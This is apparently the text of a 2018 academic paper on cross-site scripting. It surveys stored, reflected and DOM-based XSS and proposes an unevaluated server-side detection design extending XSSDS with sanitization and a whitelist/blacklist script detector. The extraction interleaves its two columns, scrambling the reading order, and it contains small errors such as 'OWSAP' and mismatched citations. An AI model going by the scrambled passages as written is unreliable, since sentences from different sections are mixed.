Advanced Approach on XSSDS Technique

Sara Tuza Shatha Alarabi

Department of Information Security l Department of Information Security
Naif Arab University for Security Science Naif Arab University for Security Science
Riyadh, Saudi Arabia Riyadh, Saudi Arabia
4370887@nauss.edu.sa 4370882@nauss.edu.sa

Sara Alamri Dr. Nisreen Innab

Department of Information Security Department of Information Security
Naif Arab University for Security Science Naif Arab University for Security Science
Riyadh, Saudi Arabia Riyadh, Saudi Arabia
4370892@nauss.edu.sa Nisreen.innab@nauss.edu.sa

Abstract— In order to develop web applications, the developers considered to be the third dangerous flaw in the list of OWSAP
will need to use different technologies. The most common of these 2017 top ten web application security risks [1].
technologies are the HTML, XHTML and JavaScript. The
vulnerabilities in these technologies arise many security attacks
on the web applications. The most important and common one is
Cross-site scripting (XSS) attack, which can be defined as code
injection attack, this attack allows the attacker to execute
malicious script in another user's browser. Once the attacker
gains control, he will be able to perform actions such as session-
hijacking, malware-spreading, cookie-stealing and malicious
redirection by embedding scripts in a web page that will get
executed whenever the page is loaded. In this paper, we explore
the different types of XSS attack and its impact on both server
and client-side. After that, we select three server-side detection
techniques, addressing how each technique work and the main
weaknesses of each one, then we selected one of those techniques
which is XSSDS and provide an advanced approach of it that
could cover its weaknesses.

Keywords- cross-Site Scripting; XSS; XSSDS; security attack;

detection techniques; persistent XSS; non-persistent XSS; server- Figure 1. Top ten OWASP vulnerabilities.
side Approach
Cross site scripting (XSS) is one of the powerful keys for
I. INTRODUCTION the attacker by injecting the malicious script, also whenever
HTML code is generated the attacker could insert his own
Nowadays the web applications importance has been HTML code or modifying the code of the system of the web
raised up and can be considered the widest spread tool for application where the victim will be captured/redirected while
providing information and services release around the globe, the user is waiting for his/her page to be loaded. Hackers use
specifically those covering health care, banking services, e- different techniques such as small videos, links, or any other
commerce, etc. However, there are some vulnerabilities that information that might take the attention of the users so the
the attacker could exploit it and then use it for their own hackers can transfer the user from one page to another, wherein
malicious intent. Therefore, our job is to secure the user the hacker might access all of the client’s confidential
confidential information and maintain the integrity of the web information [2].
applications.
One of the known vulnerabilities on the web applications A. Persistent or Stored XSS Attack
is the Cross cite scripting (XSS) as Figure 1 which is Persistent XSS as Figure 2 also known as (Stored XSS
attack) which is a script that persists on a website and usually

978-1-5386-4110-1/18/$31.00 ©2018 IEEE

has a malicious code stored in the website database. This script was created by the original clients, and afterwards the system
that has a malicious code will be a part of the web application will be running it in unexpected manner.
and it will be run within the user's browser if it is not filtered.
This kind considered to be more harmful than other types and it
is often hard to detect, the reason behind that, all of the web
application users will be affected not an individual/specific
user. Simply when visiting the webpage, the victim will be
compromised and no need for a malicious link for exploitation.

Figure 4. DOM-based XSS.

The main impacts of XSS attack is:

• Steal sensitive information.
• Phishing.
Figure 2. Persistent or Stored XSS Attack.
• Modifying user setting.
• Download malware.
B. Non-Persistent or Reflected XSS Attack
• Cookies steeling.
Non-Persistent Script also known as reflected XSS
attack, as Figure 3 the name implies the script is not persistent • Session Hijacking.
in the website which means that it will only affect the users
who running the code directly. Usually in these cases the web In this paper, our contributions are as follows:
creator might forget to protect the web data. An attacker hides • First of all, we addressed the main major security
malicious script in the URL and mask it as user input, or issues for the web applications and internet services,
sending emails to the victims that motivate the users to click on also we referred to the “Website Security Statistics
the URL. Then the harmful script will execute in the browser Report” (2017) of OWSAP.
this will allow the attacker to do his malicious motivation.
• We emphasize a comprehensive study on XSS attacks
describing its types and its impact.
• Addressing three server-side techniques that detect
XSS attacks and highlighting the weaknesses for each
one.
• We proposed an advanced approach of XSSDS
technique that could cover its main weaknesses.
The rest of the paper is organized as follows. Section II
addressing the related work papers and techniques. In section
III, we addressed the models that could cover XSSDS
weaknesses, in section IV we proposed the advanced approach
of XSSDS after adding the new two models. We conclude the
paper in section V.
Figure 3. Non-Persistent or Reflected XSS Attack.
II. RELATED WORK
In this section, we present various XSS attacks detection
C. DOM-based XSS Attack and mitigation techniques, having brief description for
DOM Scripting (XSS) as Figure 4 is an attack payload eachtechnique and the discovered weaknesses for each one.
by modifying the DOM in the user or victim browser, which
A. S2 XS2 Detection Technique A. Input Filtration and Sanitization Model
S2 XS2 [4]: an automated server-side detection technique In order to solve the first problem, many techniques
for XSS attack, which based on the concept of “boundary used the filtration and sanitization approach. The older
injection” to encapsulate dynamic generated content and approach in the filtration was focusing on making filtration in
“policy generation” to validate the data. These legitimate the input while sanitization on the output of the database.
features are analyzed throughout the generation of HTTP However, after implementing this technique, it discovers that
response to discover the XSS attacks. But this technique has a this solution reduces the false positive however didn’t
main weakness point which is that it suffers from runtime eliminate it. Thus, a further research has been done on this area
overhead in policy checks and thus break down the attack to find better solution and the proposed one is to keep the same
detection capability. elements but moving the sanitization to become before the
filtration process, thus both filtration and sanitization now are
B. XSSDS Detection Technique implemented on the client input [7].
XSSDS [5]: this technique is a server- side detection In Figure 5 explains the way in which XSS attacks are
technique of Cross- Site Scripting attacks, this technique filtered in the model, below are the steps followed in the
considered as a passive technique since it is not taking any process:
steps to prevent the attack whenever it is happened. It discovers
the XSS attack by monitoring the passive HTTP traffic. The • Client access from his Web browser to the Web
idea of XSSDS is: Application and HTTP Request is sent.

• first discovers the non-persistent XSS attack by • HTTP request will include the user input data which
analyzing the HTTP request parameters with HTTP may contain malicious content.
response data produced by the web application and • Sanitizer is sanitizing the received input and clean it.
diminished by filtering the HTTP response.
• Cleaned data will be passed to the filtration process,
• Secondly it detects the persistent XSS attack that where the data is scanned and filtered for any html tag.
maintains list of all used scripts in web applications
and discovers the deviation in the number of scripts. • After they are considered safe, the input is stored in the
database and the web response will be generated.
• However, the main weakness on this technique is
focused on two main things:
• This technique suffering from few false positives
attacks.
• Have simple training phase for the collection of scripts.

C. SWAP Detection Technique

SWAP [6]: SWAP comprises a reverse proxy, this means
it relays all HTML traffic between the Web server and client
browser. SWAP is detection technique which only monitor to
detect any XSS attack. SWAP technique is similar to BEEP
and Noncespaces. However, both BEEP and Noncespaces need
client-side modification while SWAP is performing all XSS
mitigation on the server-side. It does not require any client-side
modifications. However, the main weakness on this technique
is that there are many and different types of XSS attacks that Figure 5. Filtering and Sanitizing XSS input.
can’t be detected.
B. Advanced Model of Training Detector
III. OUR PROPOSED MODELS In the second problem in XXSDS, it is requiring a more
advanced training phase for the collection of more scripts. The
In this section, we proposed solution for the weaknesses current training detector is checking every received script
that raised in XSSDS approach in new models, which are: against its list, if the script is listed then it is counted as
authorized script and will be passed through the database,
• This technique suffering from few false positives otherwise the training detector will reject the script and will
attacks. count it as XSS attack [5].

• Have simple training detect for set of scripts. However, this detection technique is pretty simple and
might count many scripts as XSS attacks while it is not. Thus,
we add additional layer in our approach in order to categorize
the scripts more accurately. In our approach, if the script is not
listed in the training list then it will be checked with the white
script list (which has the popular trusted web scripts), if it is By this approach, each request will be received will go through
exist in this list then an alarm will be sent to the admin in order the following:
to check and verify this script with ability to accept or reject it;
in case he accept it then the received script will be added to the • First of all, the system will verify it against the training
training list and if not then it will be added to the black list and list which maintain all used scripts in the web
will consider as XSS attack, and if the script is not listed either application
to the training list or to the white script list then it will be added • If the script is within the training list it will be passed
right away to the black list and will be counted as XSS attack. directly to the filtration process.
As in Figure 6.
ƒ Else, the system will verify it against ‘white
scripts list’ which contains the most popular
scripts that can be used in any web-
application.
ƒ It the script within the white script list then
an alert will be sent to the admin and new
record will be added to the log.
ƒ Admin will have the ability to verify the
script and accept or either reject it.
ƒ In case the admin accepts it, it will be added
automatically to the training list and will be
considered as authorized script, and if the
admin rejects it, then it will be added in the
black list and will be considered as XSS
attack.

• In the sanitization process, the received HTTP request

will go through Sanitizer layer in order to clean the
Figure 6. Advanced Training list detector. request.
• Then the request will go through the filtration layer
which will scan for any presence of HTML tags and
IV. IMPLEMENTATION remove it.
In the previous section we discussed separately the • By this, the request now can be considered a safe
solution for each weakness the XSSDS has. In this section, we request and can be saved in the database without any
propose an advanced version of XSSDS by combining the two issues.
models together, as shown in the figure 7 below:
• After saving the client request in the database, the
system will generate HTTP response and direct it to
the client.

V. CONCLUSION
In this paper we have proposed an advance approach of
XSSDS technique that cover its weaknesses, which use to
detect XSS attacks. However, our solution combines between
two proposed models which are “Filtration and Sanitization”
model and “Advanced training list” model. This approach shall
provide a satisfied security level against XSS attack.
As our future work, we plan to evaluate our proposed
approach by implementing and examining it, and comparing
the new approach with the previous approach through the
experimental results. Finally, our goal is to have a complete
detection for XSS attack.

REFERENCES
Figure 7. Advanced Approach for XSSDS Technique.
[1] (2016, April 04) Cross Site Scripting [Online]. Available [5] Johns M, Engelmann B, Posegga J (2008) XSSDS: server- side detection
at:https://www.owasp.org/index.php/Cross-site_Scripting_(XSS). of cross-site scripting attacks. In: Proceedings of the ACSAC,
[2] (2017). OWASP Top 10 - 2013: The Ten Most Critical Web Application California, pp 335–344.
Security Risks. OWASP [Online]. [6] Wurzinger P, Platzer C, Ludl C, Kirda E, Kruegel C (2009) SWAP:
Available:https://www.owasp.org/index.php/Top_10_2017-Top_10. mitigating XSS attacks using a reverse proxy. In: ICSE workshop on
[3] Gupta, Shashank, and B. B. Gupta. “XSS-SAFE: A Server-Side software engineering for secure systems. IEEE Computer Society.
Approach to Detect and Mitigate Cross-Site Scripting (XSS) Attacks in [7] Maurya, S. (2015). Positive security model based server-side solution
JavaScript Code.” Arabian Journal for Science and Engineering. for prevention of cross-site scripting attacks. 2015 Annual IEEE India
[4] Shaihriar H, Zulkernine M (2011a) S2XS2: a server side approach to Conference (INDICON).
automatically detect XSS attacks. In: Ninth international conference on
dependable, automatic secure computing. IEEE, pp 7–17.